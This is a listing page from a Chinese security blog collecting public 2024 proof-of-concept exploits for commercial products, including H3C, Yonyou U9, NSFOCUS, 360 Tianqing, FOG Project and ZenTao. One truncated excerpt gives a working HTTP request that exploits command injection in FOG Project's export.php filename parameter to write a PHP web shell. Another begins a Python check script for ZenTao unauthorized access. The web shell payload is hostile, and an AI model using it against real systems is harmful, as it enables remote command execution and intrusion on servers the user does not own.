2024你懂的 第16页
2024攻防互联网公开POC
建文工程管理系统desktop.ashx存在SQL注入漏洞_秃兔安全
H3C Magic B1STV100R012 RCE_秃兔安全
云时空商业ERP文件上传_秃兔安全
用友U9-UMWebService.asmx存在文件读取漏洞_秃兔安全
H3C Workspace 云桌面 远程命令执行漏洞_秃兔安全
绿盟 SAS堡垒机 Exec 远程命令执行漏洞_秃兔安全
360天擎 – 未授权访问_秃兔安全
fogproject系统接口export.php存在远程命令执行漏洞_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01095
金和OA jc6 clobfield SQL注入漏洞_秃兔安全
禅道研发项⽬管理系统未授权_秃兔安全

禅道研发项⽬管理系统未授权

import requests def check(url):url1 = url+’/misc-captcha-user.html’# url1 = url+’/index.php?m=misc&f=captcha&sessionVar=user’#非伪静态版本按照此格式传参# url2 = url+’/...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
010813